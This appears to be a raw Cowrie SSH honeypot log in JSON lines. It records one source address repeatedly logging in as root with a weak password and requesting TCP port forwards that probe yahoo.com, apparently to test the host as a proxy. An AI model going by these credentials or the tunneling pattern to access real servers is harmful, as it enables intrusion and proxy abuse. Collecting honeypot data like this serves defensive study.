{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:11.963860Z","src_ip":"213.209.150.239","session":"a115d1451798"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.021384Z","src_ip":"213.209.150.239","session":"a115d1451798"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63297,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0fb96c3c760","protocol":"ssh","message":"New connection: 213.209.150.239:63297 (1.2.3.4:22) [session: d0fb96c3c760]","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.076866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.077843Z","src_ip":"213.209.150.239","session":"d0fb96c3c760"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.134269Z","src_ip":"213.209.150.239","session":"d0fb96c3c760"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.416380Z","src_ip":"213.209.150.239","session":"d0fb96c3c760"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":14630,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:14630","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.474149Z","session":"d0fb96c3c760"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.530819Z","src_ip":"213.209.150.239","session":"d0fb96c3c760"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":7711,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7711","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.687080Z","session":"d0fb96c3c760"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.743696Z","src_ip":"213.209.150.239","session":"d0fb96c3c760"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.801297Z","src_ip":"213.209.150.239","session":"d0fb96c3c760"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63327,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5ab52d6f838","protocol":"ssh","message":"New connection: 213.209.150.239:63327 (1.2.3.4:22) [session: b5ab52d6f838]","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.847198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.848440Z","src_ip":"213.209.150.239","session":"b5ab52d6f838"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:12.896219Z","src_ip":"213.209.150.239","session":"b5ab52d6f838"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.130975Z","src_ip":"213.209.150.239","session":"b5ab52d6f838"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":1277,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1277","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.178985Z","session":"b5ab52d6f838"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.226151Z","src_ip":"213.209.150.239","session":"b5ab52d6f838"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":31337,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31337","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.361585Z","session":"b5ab52d6f838"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.408710Z","src_ip":"213.209.150.239","session":"b5ab52d6f838"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.457191Z","src_ip":"213.209.150.239","session":"b5ab52d6f838"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63364,"dst_ip":"1.2.3.4","dst_port":22,"session":"a94282d3c3a2","protocol":"ssh","message":"New connection: 213.209.150.239:63364 (1.2.3.4:22) [session: a94282d3c3a2]","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.512809Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.513566Z","src_ip":"213.209.150.239","session":"a94282d3c3a2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.570193Z","src_ip":"213.209.150.239","session":"a94282d3c3a2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.853341Z","src_ip":"213.209.150.239","session":"a94282d3c3a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":16458,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:16458","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.911144Z","session":"a94282d3c3a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:13.967938Z","src_ip":"213.209.150.239","session":"a94282d3c3a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":5960,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:5960","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.122964Z","session":"a94282d3c3a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.179535Z","src_ip":"213.209.150.239","session":"a94282d3c3a2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.236705Z","src_ip":"213.209.150.239","session":"a94282d3c3a2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63418,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb848971fad1","protocol":"ssh","message":"New connection: 213.209.150.239:63418 (1.2.3.4:22) [session: cb848971fad1]","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.292376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.293030Z","src_ip":"213.209.150.239","session":"cb848971fad1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.349699Z","src_ip":"213.209.150.239","session":"cb848971fad1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.631441Z","src_ip":"213.209.150.239","session":"cb848971fad1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":20869,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20869","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.688748Z","session":"cb848971fad1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.745258Z","src_ip":"213.209.150.239","session":"cb848971fad1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":24591,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24591","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.898869Z","session":"cb848971fad1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:14.955348Z","src_ip":"213.209.150.239","session":"cb848971fad1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.012801Z","src_ip":"213.209.150.239","session":"cb848971fad1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63456,"dst_ip":"1.2.3.4","dst_port":22,"session":"72c4eb404daa","protocol":"ssh","message":"New connection: 213.209.150.239:63456 (1.2.3.4:22) [session: 72c4eb404daa]","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.068528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.069210Z","src_ip":"213.209.150.239","session":"72c4eb404daa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.126196Z","src_ip":"213.209.150.239","session":"72c4eb404daa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.409476Z","src_ip":"213.209.150.239","session":"72c4eb404daa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":22735,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22735","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.466874Z","session":"72c4eb404daa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.523747Z","src_ip":"213.209.150.239","session":"72c4eb404daa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":8448,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8448","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.679045Z","session":"72c4eb404daa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.735753Z","src_ip":"213.209.150.239","session":"72c4eb404daa"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.793095Z","src_ip":"213.209.150.239","session":"72c4eb404daa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63510,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8c2b62c29a6","protocol":"ssh","message":"New connection: 213.209.150.239:63510 (1.2.3.4:22) [session: e8c2b62c29a6]","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.848711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:15.849337Z","src_ip":"213.209.150.239","session":"e8c2b62c29a6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-e